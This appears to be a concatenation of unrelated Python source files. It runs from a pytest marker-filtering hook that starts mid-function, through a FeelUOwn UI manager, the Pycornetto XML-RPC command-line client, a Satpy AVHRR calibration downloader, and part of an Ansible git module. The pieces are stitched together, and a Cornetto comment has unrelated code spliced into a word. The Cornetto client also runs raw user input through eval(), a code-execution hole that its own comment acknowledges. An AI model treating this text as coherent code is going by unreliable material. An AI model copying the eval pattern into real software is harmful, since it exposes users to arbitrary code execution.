    """Add markers for testimony tokens and filter the collection by them."""
    # split the option string and handle no option, single option, multiple
    # config.getoption(default) doesn't work like you think it does, hence or ''
    importance = [i for i in (config.getoption('importance') or '').split(',') if i != '']
    component = [c for c in (config.getoption('component') or '').split(',') if c != '']
    assignee = [a for a in (config.getoption('assignee') or '').split(',') if a != '']

    selected = []
    deselected = []
    logger.info('Processing test items to add testimony token markers')
    for item in items:
        if item.nodeid.startswith('tests/robottelo/'):
            # Unit test, no testimony markers
            continue

        # apply the marks for importance, component, and assignee
        # Find matches from docstrings starting at smallest scope
        item_docstrings = [
            d
            for d in map(inspect.getdoc, (item.function, getattr(item, 'cls', None), item.module))
            if d is not None
        ]
        item_mark_names = [m.name for m in item.iter_markers()]
        for docstring in item_docstrings:
            # Add marker starting at smallest docstring scope
            # only add the mark if it hasn't already been applied at a lower scope
            # BUG FIX: record each name as it is added, so a larger-scope
            # docstring cannot re-apply a marker a smaller scope already set.
            doc_component = component_regex.findall(docstring)
            if doc_component and 'component' not in item_mark_names:
                item.add_marker(pytest.mark.component(doc_component[0]))
                item_mark_names.append('component')
            doc_importance = importance_regex.findall(docstring)
            if doc_importance and 'importance' not in item_mark_names:
                item.add_marker(pytest.mark.importance(doc_importance[0]))
                item_mark_names.append('importance')
            doc_assignee = assignee_regex.findall(docstring)
            if doc_assignee and 'assignee' not in item_mark_names:
                item.add_marker(pytest.mark.assignee(doc_assignee[0]))
                item_mark_names.append('assignee')

        # when no filter option was passed, keep the item without inspecting
        # its marks (nothing is ever deselected in that case)
        if importance or component or assignee:
            # Filter test collection based on CLI options for filtering
            # filters should be applied together
            # such that --component Repository --importance Critical --assignee jsmith
            # only collects tests which have all three of these marks

            # https://github.com/pytest-dev/pytest/issues/1373  Will make this way easier
            # testimony requires both importance and component, this will blow up if its forgotten
            importance_marker = item.get_closest_marker('importance').args[0]
            if importance and importance_marker not in importance:
                logger.debug(
                    f'Deselected test {item.nodeid} due to "--importance {importance}",'
                    f'test has importance mark: {importance_marker}'
                )
                deselected.append(item)
                continue
            component_marker = item.get_closest_marker('component').args[0]
            if component and component_marker not in component:
                logger.debug(
                    f'Deselected test {item.nodeid} due to "--component {component}",'
                    f'test has component mark: {component_marker}'
                )
                deselected.append(item)
                continue
            assignee_marker = item.get_closest_marker('assignee').args[0]
            if assignee and assignee_marker not in assignee:
                logger.debug(
                    f'Deselected test {item.nodeid} due to "--assignee {assignee}",'
                    f'test has assignee mark: {assignee_marker}'
                )
                deselected.append(item)
                continue
            selected.append(item)

    # selected will be empty if no filter option was passed, defaulting to full items list
    items[:] = selected if deselected else items
    config.hook.pytest_deselected(items=deselected)

from feeluown.utils.dispatch import Signal
from feeluown.gui.widgets.my_music import MyMusicModel


class MyMusicItem(object):
    """A clickable entry in the "my music" section."""

    def __init__(self, text):
        # Emitted when the user activates this entry.
        self.clicked = Signal()
        # Display text for the entry.
        self.text = text


class MyMusicUiManager:
    """Manage the "my music" items shown in the UI.

    .. note::

        For now the items are kept in a plain list and only ``add_item``
        and ``clear`` are offered.  Items are meant to stay associated with
        their provider, which acts as the context of "my music"; the
        provider itself is a higher-level object that exposes finer-grained
        accessors such as ``get_item``.
    """

    def __init__(self, app):
        self._app = app
        self._items = []
        self.model = MyMusicModel(app)

    @classmethod
    def create_item(cls, text):
        """Factory helper returning a plain :class:`MyMusicItem`."""
        return MyMusicItem(text)

    def add_item(self, item):
        """Append *item* to the model and to the internal list."""
        self.model.add(item)
        self._items.append(item)

    def clear(self):
        """Drop every item from the internal list and the model."""
        self._items.clear()
        self.model.clear()

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# Copyright (C) 2008-2013 by 
# Erwin Marsi and Tilburg University


# This file is part of the Pycornetto package.

# Pycornetto is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.

# Pycornetto is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.

# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

"""
A simple client to connect to the Cornetto database server.
Reads queries from standard input and writes results to standard output.
"""

# BUGS:
# - there is no way interrupt a query that goes bad on the server, as obviously
#   a local Ctrl-C does not work


__author__ = 'Erwin Marsi <e.marsi@gmail.com>'
__version__ = '0.6.1'

# using optparse instead of argparse so client can run stand-alone 
from sys import stdin, stdout, stderr, exit
from optparse import OptionParser, IndentedHelpFormatter
import xmlrpclib 
from pprint import pformat
from socket import error as SocketError



class MyFormatter(IndentedHelpFormatter):
    """to prevent optparse from messing up the epilog text"""

    def format_epilog(self, epilog):
        # Pass the epilog through untouched (optparse would re-wrap it).
        if epilog:
            return epilog
        return ""

    def format_description(self, description):
        # Keep the description as-is apart from leading whitespace.
        return description.lstrip()
    

# Usage examples appended verbatim to the --help output (MyFormatter keeps
# the layout intact instead of letting optparse re-wrap it).
epilog = """
Interactive usage:

  $ cornetto-client.py
  $ cornetto-client.py -a
  
File processing:

  $ echo 'ask("pijp")' | cornetto-client.py
  $ cornetto-client.py <input >output
"""

# Build the command line parser; fall back for old optparse versions that
# lack the epilog keyword by folding the examples into the description.
try:
    parser = OptionParser(description=__doc__, version="%(prog)s version " +
                          __version__, epilog=epilog, formatter=MyFormatter())
except TypeError:
    # optparse in python 2.4 has no epilog keyword
    parser = OptionParser(description=__doc__ + epilog, 
                          version="%(prog)s version " + __version__)
    
    


parser.add_option("-a", "--ask", action='store_true',
                  help="assume all commands are input the 'ask' function, "
                  "- so you can type 'query' instead of 'ask(\"query\") -  '"
                  "but online help is no longer accessible" )

parser.add_option("-H", "--host", default="localhost:5204",
                    metavar="HOST[:PORT]",
                    help="name or IP address of host (default is 'localhost') "
                    "optionally followed by a port number "
                    "(default is 5204)")

parser.add_option('-n', '--no-pretty-print', dest="pretty_print", action='store_false', 
                  help="turn off pretty printing of output "
                  "(default when standard input is a file)")

parser.add_option("-p", "--port", type=int, default=5204,
                  help='port number (default is 5204)')

parser.add_option('-P', '--pretty-print', dest="pretty_print", action='store_true', 
                  help="turn on pretty printing of output "
                  "(default when standard input is a tty)")


parser.add_option("-e", "--encoding", default="utf8", metavar="utf8,latin1,ascii,...",
                  help="character encoding of output (default is utf8)")

parser.add_option('-V', '--verbose', action='store_true', 
                  help="verbose output for debugging")


(opts, args) = parser.parse_args()


if opts.host.startswith("http://"):
    opts.host = opts.host[7:]

try:
    host, port = opts.host.split(":")[:2]
except ValueError:
    host, port = opts.host, None
    
# XMP-RPC requires specification of protocol
host = "http://" + (host or "localhost")

try:
    port = int(port or 5204)
except ValueError:
    exit("Error: %s is not a valid port number" % repr(port))

server = xmlrpclib.ServerProxy("%s:%s" %  (host, port),
                               encoding="utf-8",
                               verbose=opts.verbose)
try:
    eval('server.echo("test")')
except SocketError, inst:
    print >>stderr, "Error: %s\nCornetto server not running on %s:%s ?" % (
        inst, host, port), "See cornetto-server.py -h"
    exit(1)

    
help_text = """
Type "?" to see his message.
Type "help()" for help on available methods.
Type "Ctrl-D" to exit.
Restart with "cornetto-client.py -h" to see command line options.
"""

startup_msg = ( "cornetto-client.py (version %s)\n" % __version__ + 
                "Copyright (c) Erwin Marsi\n" + help_text )

    

if stdin.isatty():
    prompt = "$ "
    if opts.pretty_print is None:
        opts.pretty_print = True
    print startup_msg
else:
    prompt = ""
    if opts.pretty_print is None:
        opts.pretty_print = False
    
# use of eval might allow arbitrary code execution - probably not entirely safe    
if opts.ask:
    process = lambda c: eval('server.ask("%s")' % c.strip())
else:
    process = lambda c: eval("server." + c.strip())

if opts.pretty_print:
    formatter = pformat
else:
    formatter = repr

# This is nasty way to enforce encoleast_common_subsumers("fiets", "auto")ding of strings embedded in lists or dicts.
# For examample [u'plafonnière'] rather than [u"plafonni\xe8re"]
encoder = lambda s: s.decode("unicode_escape").encode(opts.encoding, "backslashreplace") 


while True:
    try:
        command = raw_input(prompt)
        if command == "?":
            print help_text
        else:
            result = process(command)
            print encoder(formatter(result))
    except EOFError:
        print "\nSee you later alligator!"
        exit(0)
    except KeyboardInterrupt:
        print >>stderr, "\nInterrupted. Latest command may still run on the server though..."
    except SyntaxError:
        print >>stderr, "Error: invalid syntax"
    except NameError, inst:
        print >>stderr, "Error:", inst, "- use quotes?"
    except xmlrpclib.Error, inst:
        print >>stderr, inst
    except SocketError:
        print >>stderr, "Error: %s\nCornetto server not running on %s:%s ?\n" % (
            inst, host, port), "See cornetto-server.py -h"


#from moderation import moderation
#from .models import SuccessCase


#moderation.register(SuccessCase)

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2015 Satpy developers
#
# This file is part of satpy.
#
# satpy is free software: you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# satpy is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE.  See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# satpy.  If not, see <http://www.gnu.org/licenses/>.
"""Fetch avhrr calibration coefficients."""
import datetime as dt
import os.path
import sys

import h5py
import urllib2

BASE_URL = "http://www.star.nesdis.noaa.gov/smcd/spb/fwu/homepage/" + \
           "AVHRR/Op_Cal_AVHRR/"

URLS = {
    "Metop-B":
    {"ch1": BASE_URL + "Metop1_AVHRR_Libya_ch1.txt",
     "ch2": BASE_URL + "Metop1_AVHRR_Libya_ch2.txt",
     "ch3a": BASE_URL + "Metop1_AVHRR_Libya_ch3a.txt"},
    "Metop-A":
    {"ch1": BASE_URL + "Metop2_AVHRR_Libya_ch1.txt",
     "ch2": BASE_URL + "Metop2_AVHRR_Libya_ch2.txt",
     "ch3a": BASE_URL + "Metop2_AVHRR_Libya_ch3a.txt"},
    "NOAA-16":
    {"ch1": BASE_URL + "N16_AVHRR_Libya_ch1.txt",
     "ch2": BASE_URL + "N16_AVHRR_Libya_ch2.txt"},
    "NOAA-17":
    {"ch1": BASE_URL + "N17_AVHRR_Libya_ch1.txt",
     "ch2": BASE_URL + "N17_AVHRR_Libya_ch2.txt",
     "ch3a": BASE_URL + "N17_AVHRR_Libya_ch3a.txt"},
    "NOAA-18":
    {"ch1": BASE_URL + "N18_AVHRR_Libya_ch1.txt",
     "ch2": BASE_URL + "N18_AVHRR_Libya_ch2.txt"},
    "NOAA-19":
    {"ch1": BASE_URL + "N19_AVHRR_Libya_ch1.txt",
     "ch2": BASE_URL + "N19_AVHRR_Libya_ch2.txt"}
}


def get_page(url):
    """Retrieve the given page."""
    response = urllib2.urlopen(url)
    return response.read()


def get_coeffs(page):
    """Parse calibration coefficients from a downloaded page.

    Returns a dict with parallel lists: 'datetime' ([year, month, day]
    triples) plus 'slope1', 'intercept1', 'slope2' and 'intercept2'.
    """
    value_names = ('slope1', 'intercept1', 'slope2', 'intercept2')
    coeffs = {name: [] for name in ('datetime',) + value_names}

    # Column numbers of (slope_lo, int_lo, slope_hi, int_hi); unknown until
    # the header line has been seen.
    col_idx = None
    date_idx = 0

    for line in page.lower().split('\n'):
        fields = line.split()
        if not fields:
            continue
        if fields[0] == 'update':
            # Header line: remember where each coefficient column lives.
            col_idx = (fields.index('slope_lo'), fields.index('int_lo'),
                       fields.index('slope_hi'), fields.index('int_hi'))
            continue
        if col_idx is None:
            # Data before the header cannot be interpreted.
            continue
        if max(col_idx) >= len(fields):
            # In some cases the fields are connected, skip those rows.
            continue
        try:
            date = dt.datetime.strptime(fields[date_idx], "%m/%d/%Y")
        except ValueError:
            continue

        coeffs['datetime'].append([date.year, date.month, date.day])
        for name, idx in zip(value_names, col_idx):
            coeffs[name].append(float(fields[idx]))

    return coeffs


def get_all_coeffs():
    """Get all available calibration coefficients for the satellites."""
    coeffs = {}
    for platform, channels in URLS.items():
        platform_coeffs = coeffs.setdefault(platform, {})
        for chan, url in channels.items():
            print(url)
            platform_coeffs[chan] = get_coeffs(get_page(url))
    return coeffs


def save_coeffs(coeffs, out_dir=''):
    """Save calibration coefficients to one HDF5 file per platform."""
    for platform, channels in coeffs.items():
        fname = os.path.join(out_dir, "%s_calibration_data.h5" % platform)
        fid = h5py.File(fname, 'w')

        for chan, values in channels.items():
            group = fid.create_group(chan)
            for key in ('datetime', 'slope1', 'intercept1',
                        'slope2', 'intercept2'):
                group[key] = values[key]

        fid.close()
        print("Calibration coefficients saved for %s" % platform)


def main():
    """Create calibration coefficient files for AVHRR."""
    out_dir = sys.argv[1]
    save_coeffs(get_all_coeffs(), out_dir=out_dir)


if __name__ == "__main__":
    main()

#!/usr/bin/python
# -*- coding: utf-8 -*-

# (c) 2012, Michael DeHaan <michael.dehaan@gmail.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)

from __future__ import absolute_import, division, print_function
__metaclass__ = type


# DOCUMENTATION is a YAML string consumed by Ansible's documentation tooling
# (e.g. ansible-doc); it declares the module's options, defaults and history.
# It is runtime data, not a docstring — do not edit casually.
DOCUMENTATION = '''
---
module: git
author:
    - "Ansible Core Team"
    - "Michael DeHaan"
version_added: "0.0.1"
short_description: Deploy software (or files) from git checkouts
description:
    - Manage I(git) checkouts of repositories to deploy files or software.
options:
    repo:
        description:
            - git, SSH, or HTTP(S) protocol address of the git repository.
        type: str
        required: true
        aliases: [ name ]
    dest:
        description:
            - The path of where the repository should be checked out. This
              is equivalent to C(git clone [repo_url] [directory]). The repository
              named in I(repo) is not appended to this path and the destination directory must be empty. This
              parameter is required, unless I(clone) is set to C(no).
        type: path
        required: true
    version:
        description:
            - What version of the repository to check out. This can be
              the literal string C(HEAD), a branch name, a tag name.
              It can also be a I(SHA-1) hash, in which case I(refspec) needs
              to be specified if the given revision is not already available.
        type: str
        default: "HEAD"
    accept_hostkey:
        description:
            - If C(yes), ensure that "-o StrictHostKeyChecking=no" is
              present as an ssh option.
        type: bool
        default: 'no'
        version_added: "1.5"
    accept_newhostkey:
        description:
            - As of OpenSSH 7.5, "-o StrictHostKeyChecking=accept-new" can be
              used which is safer and will only accepts host keys which are
              not present or are the same. if C(yes), ensure that
              "-o StrictHostKeyChecking=accept-new" is present as an ssh option.
        type: bool
        default: 'no'
        version_added: "2.12"
    ssh_opts:
        description:
            - Creates a wrapper script and exports the path as GIT_SSH
              which git then automatically uses to override ssh arguments.
              An example value could be "-o StrictHostKeyChecking=no"
              (although this particular option is better set by
              I(accept_hostkey)).
        type: str
        version_added: "1.5"
    key_file:
        description:
            - Specify an optional private key file path, on the target host, to use for the checkout.
        type: path
        version_added: "1.5"
    reference:
        description:
            - Reference repository (see "git clone --reference ...").
        version_added: "1.4"
    remote:
        description:
            - Name of the remote.
        type: str
        default: "origin"
    refspec:
        description:
            - Add an additional refspec to be fetched.
              If version is set to a I(SHA-1) not reachable from any branch
              or tag, this option may be necessary to specify the ref containing
              the I(SHA-1).
              Uses the same syntax as the C(git fetch) command.
              An example value could be "refs/meta/config".
        type: str
        version_added: "1.9"
    force:
        description:
            - If C(yes), any modified files in the working
              repository will be discarded.  Prior to 0.7, this was always
              'yes' and could not be disabled.  Prior to 1.9, the default was
              `yes`.
        type: bool
        default: 'no'
        version_added: "0.7"
    depth:
        description:
            - Create a shallow clone with a history truncated to the specified
              number or revisions. The minimum possible value is C(1), otherwise
              ignored. Needs I(git>=1.9.1) to work correctly.
        type: int
        version_added: "1.2"
    clone:
        description:
            - If C(no), do not clone the repository even if it does not exist locally.
        type: bool
        default: 'yes'
        version_added: "1.9"
    update:
        description:
            - If C(no), do not retrieve new revisions from the origin repository.
            - Operations like archive will work on the existing (old) repository and might
              not respond to changes to the options version or remote.
        type: bool
        default: 'yes'
        version_added: "1.2"
    executable:
        description:
            - Path to git executable to use. If not supplied,
              the normal mechanism for resolving binary paths will be used.
        type: path
        version_added: "1.4"
    bare:
        description:
            - If C(yes), repository will be created as a bare repo, otherwise
              it will be a standard repo with a workspace.
        type: bool
        default: 'no'
        version_added: "1.4"
    umask:
        description:
            - The umask to set before doing any checkouts, or any other
              repository maintenance.
        type: raw
        version_added: "2.2"

    recursive:
        description:
            - If C(no), repository will be cloned without the --recursive
              option, skipping sub-modules.
        type: bool
        default: 'yes'
        version_added: "1.6"

    single_branch:
        description:
            - Clone only the history leading to the tip of the specified I(branch).
        type: bool
        default: 'no'
        version_added: '2.11'

    track_submodules:
        description:
            - If C(yes), submodules will track the latest commit on their
              master branch (or other branch specified in .gitmodules).  If
              C(no), submodules will be kept at the revision specified by the
              main project. This is equivalent to specifying the --remote flag
              to git submodule update.
        type: bool
        default: 'no'
        version_added: "1.8"

    verify_commit:
        description:
            - If C(yes), when cloning or checking out a I(version) verify the
              signature of a GPG signed commit. This requires git version>=2.1.0
              to be installed. The commit MUST be signed and the public key MUST
              be present in the GPG keyring.
        type: bool
        default: 'no'
        version_added: "2.0"

    archive:
        description:
            - Specify archive file path with extension. If specified, creates an
              archive file of the specified format containing the tree structure
              for the source tree.
              Allowed archive formats ["zip", "tar.gz", "tar", "tgz"].
            - This will clone and perform git archive from local directory as not
              all git servers support git archive.
        type: path
        version_added: "2.4"

    archive_prefix:
        description:
            - Specify a prefix to add to each file path in archive. Requires I(archive) to be specified.
        version_added: "2.10"
        type: str

    separate_git_dir:
        description:
            - The path to place the cloned repository. If specified, Git repository
              can be separated from working tree.
        type: path
        version_added: "2.7"

    gpg_whitelist:
        description:
           - A list of trusted GPG fingerprints to compare to the fingerprint of the
             GPG-signed commit.
           - Only used when I(verify_commit=yes).
           - Use of this feature requires Git 2.6+ due to its reliance on git's C(--raw) flag to C(verify-commit) and C(verify-tag).
        type: list
        elements: str
        default: []
        version_added: "2.9"

requirements:
    - git>=1.7.1 (the command line tool)

notes:
    - "If the task seems to be hanging, first verify remote host is in C(known_hosts).
      SSH will prompt user to authorize the first contact with a remote host.  To avoid this prompt,
      one solution is to use the option accept_hostkey. Another solution is to
      add the remote host public key in C(/etc/ssh/ssh_known_hosts) before calling
      the git module, with the following command: ssh-keyscan -H remote_host.com >> /etc/ssh/ssh_known_hosts."
    - Supports C(check_mode).
'''

# EXAMPLES is a YAML string rendered by ansible-doc; each entry is a sample
# task using this module. Runtime data — keep it valid YAML.
EXAMPLES = '''
- name: Git checkout
  ansible.builtin.git:
    repo: 'https://foosball.example.org/path/to/repo.git'
    dest: /srv/checkout
    version: release-0.22

- name: Read-write git checkout from github
  ansible.builtin.git:
    repo: git@github.com:mylogin/hello.git
    dest: /home/mylogin/hello

- name: Just ensuring the repo checkout exists
  ansible.builtin.git:
    repo: 'https://foosball.example.org/path/to/repo.git'
    dest: /srv/checkout
    update: no

- name: Just get information about the repository whether or not it has already been cloned locally
  ansible.builtin.git:
    repo: 'https://foosball.example.org/path/to/repo.git'
    dest: /srv/checkout
    clone: no
    update: no

- name: Checkout a github repo and use refspec to fetch all pull requests
  ansible.builtin.git:
    repo: https://github.com/ansible/ansible-examples.git
    dest: /src/ansible-examples
    refspec: '+refs/pull/*:refs/heads/*'

- name: Create git archive from repo
  ansible.builtin.git:
    repo: https://github.com/ansible/ansible-examples.git
    dest: /src/ansible-examples
    archive: /tmp/ansible-examples.zip

- name: Clone a repo with separate git directory
  ansible.builtin.git:
    repo: https://github.com/ansible/ansible-examples.git
    dest: /src/ansible-examples
    separate_git_dir: /src/ansible-examples.git

- name: Example clone of a single branch
  ansible.builtin.git:
    single_branch: yes
    branch: master

- name: Avoid hanging when http(s) password is missing
  ansible.builtin.git:
    repo: https://github.com/ansible/could-be-a-private-repo
    dest: /src/from-private-repo
  environment:
    GIT_TERMINAL_PROMPT: 0 # reports "terminal prompts disabled" on missing password
    # or GIT_ASKPASS: /bin/true # for git before version 2.3.0, reports "Authentication failed" on missing password
'''

# RETURN documents the structure of the module's return value (YAML consumed
# by ansible-doc). Runtime data — keep it valid YAML.
RETURN = '''
after:
    description: Last commit revision of the repository retrieved during the update.
    returned: success
    type: str
    sample: 4c020102a9cd6fe908c9a4a326a38f972f63a903
before:
    description: Commit revision before the repository was updated, "null" for new repository.
    returned: success
    type: str
    sample: 67c04ebe40a003bda0efb34eacfb93b0cafdf628
remote_url_changed:
    description: Contains True or False whether or not the remote URL was changed.
    returned: success
    type: bool
    sample: True
warnings:
    description: List of warnings if requested features were not available due to a too old git version.
    returned: error
    type: str
    sample: git version is too old to fully support the depth argument. Falling back to full checkouts.
git_dir_now:
    description: Contains the new path of .git directory if it is changed.
    returned: success
    type: str
    sample: /path/to/new/git/dir
git_dir_before:
    description: Contains the original path of .git directory if it is changed.
    returned: success
    type: str
    sample: /path/to/old/git/dir
'''

import filecmp
import os
import re
import shlex
import stat
import sys
import shutil
import tempfile
from distutils.version import LooseVersion

from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six import b, string_types
from ansible.module_utils._text import to_native, to_text
from ansible.module_utils.common.process import get_bin_path


def relocate_repo(module, result, repo_dir, old_repo_dir, worktree_dir):
    """Move the git dir from *old_repo_dir* to *repo_dir* and point the
    worktree's ``.git`` file at the new location.

    Fails the module if the target already exists; on a failed move the
    original location is restored before failing.  Records the old and new
    paths in *result* on success.
    """
    if os.path.exists(repo_dir):
        module.fail_json(msg='Separate-git-dir path %s already exists.' % repo_dir)
    if not worktree_dir:
        return
    dot_git_file_path = os.path.join(worktree_dir, '.git')
    try:
        shutil.move(old_repo_dir, repo_dir)
        with open(dot_git_file_path, 'w') as dot_git_file:
            dot_git_file.write('gitdir: %s' % repo_dir)
        result['git_dir_before'] = old_repo_dir
        result['git_dir_now'] = repo_dir
    except (IOError, OSError) as err:
        # if we already moved the .git dir, roll it back
        if os.path.exists(repo_dir):
            shutil.move(repo_dir, old_repo_dir)
        module.fail_json(msg=u'Unable to move git dir. %s' % to_text(err))


def head_splitter(headfile, remote, module=None, fail_on_error=False):
    '''Extract the branch name HEAD points at from *headfile*.

    Returns the branch name, or None when the file is missing, empty or
    unparsable (optionally failing the module instead).
    '''
    # https://github.com/ansible/ansible-modules-core/pull/907
    if not os.path.exists(headfile):
        return None

    rawdata = None
    try:
        with open(headfile, 'r') as fh:
            rawdata = fh.readline()
    except Exception:
        if fail_on_error and module:
            module.fail_json(msg="Unable to read %s" % headfile)

    if not rawdata:
        return None

    try:
        # drop the remote prefix, then keep the trailing path component
        stripped = rawdata.replace('refs/remotes/%s' % remote, '', 1)
        last_token = stripped.split(' ')[-1]
        return last_token.split('/', 2)[-1].rstrip('\n')
    except Exception:
        if fail_on_error and module:
            module.fail_json(msg="Unable to split head from '%s'" % rawdata)
    return None


def unfrackgitpath(path):
    """Canonicalize *path*: expand env vars and ``~``, resolve symlinks,
    and normalize separators. Returns None for a None input."""
    if path is None:
        return None

    # copied from ansible.utils.path
    expanded = os.path.expanduser(os.path.expandvars(path))
    return os.path.normpath(os.path.realpath(expanded))


def get_submodule_update_params(module, git_path, cwd):
    """Discover which long options this git's ``submodule update`` accepts.

    Parses the usage line printed on stderr by ``git submodule update --help``
    and returns the option names with their leading dashes stripped.
    """
    # or: git submodule [--quiet] update [--init] [-N|--no-fetch]
    # [-f|--force] [--rebase] [--reference <repository>] [--merge]
    # [--recursive] [--] [<path>...]

    # run a bad submodule command to get valid params
    rc, stdout, stderr = module.run_command("%s submodule update --help" % (git_path), cwd=cwd)

    usage_line = None
    for line in stderr.split('\n'):
        if 'git submodule [--quiet] update ' in line:
            usage_line = line

    params = []
    if usage_line:
        cleaned = usage_line.replace('[', '').replace(']', '').replace('|', ' ')
        for token in shlex.split(cleaned):
            if token.startswith('--'):
                params.append(token.replace('--', ''))

    return params


def write_ssh_wrapper(module_tmpdir):
    """Write an executable shell script suitable for use as GIT_SSH.

    The script honors GIT_SSH_OPTS and GIT_KEY from the environment and
    forces BatchMode so ssh fails instead of prompting.  Returns the path
    of the created script.
    """
    # Prefer the module tmpdir when we have full access to it — we may be
    # sudo'ing to a non-root user without rights there.  Fall back to the
    # system default temp location otherwise.
    try:
        accessible = os.access(module_tmpdir, os.W_OK | os.R_OK | os.X_OK)
    except (IOError, OSError):
        accessible = False
    if accessible:
        try:
            fd, wrapper_path = tempfile.mkstemp(prefix=module_tmpdir + '/')
        except (IOError, OSError):
            fd, wrapper_path = tempfile.mkstemp()
    else:
        fd, wrapper_path = tempfile.mkstemp()

    template = b("""#!/bin/sh
if [ -z "$GIT_SSH_OPTS" ]; then
    BASEOPTS=""
else
    BASEOPTS=$GIT_SSH_OPTS
fi

# Let ssh fail rather than prompt
BASEOPTS="$BASEOPTS -o BatchMode=yes"

if [ -z "$GIT_KEY" ]; then
    ssh $BASEOPTS "$@"
else
    ssh -i "$GIT_KEY" -o IdentitiesOnly=yes $BASEOPTS "$@"
fi
""")
    with os.fdopen(fd, 'w+b') as fh:
        fh.write(template)

    # mark the wrapper executable for the owner
    st = os.stat(wrapper_path)
    os.chmod(wrapper_path, st.st_mode | stat.S_IEXEC)
    return wrapper_path


def set_git_ssh(ssh_wrapper, key_file, ssh_opts):
    """Export the ssh wrapper, key file and ssh options to git via the
    GIT_SSH / GIT_KEY / GIT_SSH_OPTS environment variables.

    Stale (non-empty) values are removed first; GIT_KEY and GIT_SSH_OPTS
    are only set when a value is supplied.
    """
    # clear any previously exported, non-empty values
    for var in ("GIT_SSH", "GIT_KEY", "GIT_SSH_OPTS"):
        if os.environ.get(var):
            del os.environ[var]

    os.environ["GIT_SSH"] = ssh_wrapper
    if key_file:
        os.environ["GIT_KEY"] = key_file
    if ssh_opts:
        os.environ["GIT_SSH_OPTS"] = ssh_opts


def get_version(module, git_path, dest, ref="HEAD"):
    '''Return the SHA-1 that *ref* currently resolves to in the repo at *dest*.'''
    rc, stdout, stderr = module.run_command(
        "%s rev-parse %s" % (git_path, ref), cwd=dest)
    return to_native(stdout).rstrip('\n')


def ssh_supports_acceptnewhostkey(module):
    """Probe whether the local ssh accepts StrictHostKeyChecking=accept-new
    (OpenSSH >= 7.5). Fails the module when ssh is missing entirely."""
    try:
        ssh_path = get_bin_path('ssh')
    except ValueError as err:
        module.fail_json(
            msg='Remote host is missing ssh command, so you cannot '
            'use acceptnewhostkey option.', details=to_text(err))
    # ssh rejects the whole command line if it does not know the option
    rc, stdout, stderr = module.run_command(
        [ssh_path, '-o', 'StrictHostKeyChecking=accept-new', '-V'])
    return rc == 0


def get_submodule_versions(git_path, module, dest, version='HEAD'):
    """Return a dict mapping each submodule path to the commit hash its
    *version* resolves to, using ``git submodule foreach ... rev-parse``.

    Fails the module when the command fails or its output cannot be parsed.
    """
    cmd = [git_path, 'submodule', 'foreach', git_path, 'rev-parse', version]
    (rc, out, err) = module.run_command(cmd, cwd=dest)
    if rc != 0:
        module.fail_json(
            msg='Unable to determine hashes of submodules',
            stdout=out,
            stderr=err,
            rc=rc)
    submodules = {}
    subm_name = None
    for line in out.splitlines():
        if line.startswith("Entering '"):
            # "Entering '<path>'" — strip the prefix and trailing quote
            subm_name = line[10:-1]
        elif len(line.strip()) == 40:
            if subm_name is None:
                # fix: the original called fail_json() with no message at all
                module.fail_json(msg='Unable to match submodule hash to a submodule name: %s' % line.strip())
            submodules[subm_name] = line.strip()
            subm_name = None
        else:
            module.fail_json(msg='Unable to parse submodule hash line: %s' % line.strip())
    if subm_name is not None:
        module.fail_json(msg='Unable to find hash for submodule: %s' % subm_name)

    return submodules


def clone(git_path, module, repo, dest, remote, depth, version, bare,
          reference, refspec, git_version_used, verify_commit, separate_git_dir, result, gpg_whitelist, single_branch):
    ''' makes a new git repo if it does not already exist

    Builds a ``git clone`` command line from the module options (bare,
    depth, reference, single-branch, separate git dir), runs it, then
    performs follow-up work: relocating the git dir when old git lacks
    ``--separate-git-dir``, registering a non-origin remote for bare repos,
    fetching an additional refspec, and verifying the commit signature
    when requested.
    '''
    dest_dirname = os.path.dirname(dest)
    try:
        os.makedirs(dest_dirname)
    except Exception:
        # the parent directory may already exist; real problems will
        # surface when the clone command itself runs
        pass
    cmd = [git_path, 'clone']

    if bare:
        cmd.append('--bare')
    else:
        cmd.extend(['--origin', remote])

    is_branch_or_tag = is_remote_branch(git_path, module, dest, repo, version) or is_remote_tag(git_path, module, dest, repo, version)
    if depth:
        if version == 'HEAD' or refspec:
            cmd.extend(['--depth', str(depth)])
        elif is_branch_or_tag:
            cmd.extend(['--depth', str(depth)])
            cmd.extend(['--branch', version])
        else:
            # only use depth if the remote object is branch or tag (i.e. fetchable)
            module.warn("Ignoring depth argument. "
                        "Shallow clones are only available for "
                        "HEAD, branches, tags or in combination with refspec.")
    if reference:
        cmd.extend(['--reference', str(reference)])

    if single_branch:
        if git_version_used is None:
            module.fail_json(msg='Cannot find git executable at %s' % git_path)

        # --single-branch requires git >= 1.7.10; warn and skip otherwise
        if git_version_used < LooseVersion('1.7.10'):
            module.warn("git version '%s' is too old to use 'single-branch'. Ignoring." % git_version_used)
        else:
            cmd.append("--single-branch")

            if is_branch_or_tag:
                cmd.extend(['--branch', version])

    needs_separate_git_dir_fallback = False
    if separate_git_dir:
        if git_version_used is None:
            module.fail_json(msg='Cannot find git executable at %s' % git_path)
        if git_version_used < LooseVersion('1.7.5'):
            # git before 1.7.5 doesn't have separate-git-dir argument, do fallback
            needs_separate_git_dir_fallback = True
        else:
            cmd.append('--separate-git-dir=%s' % separate_git_dir)

    cmd.extend([repo, dest])
    module.run_command(cmd, check_rc=True, cwd=dest_dirname)
    if needs_separate_git_dir_fallback:
        # emulate --separate-git-dir by moving .git out of the worktree
        relocate_repo(module, result, separate_git_dir, os.path.join(dest, ".git"), dest)

    # a bare clone got no --origin option above, so add the remote by hand
    if bare and remote != 'origin':
        module.run_command([git_path, 'remote', 'add', remote, repo], check_rc=True, cwd=dest)

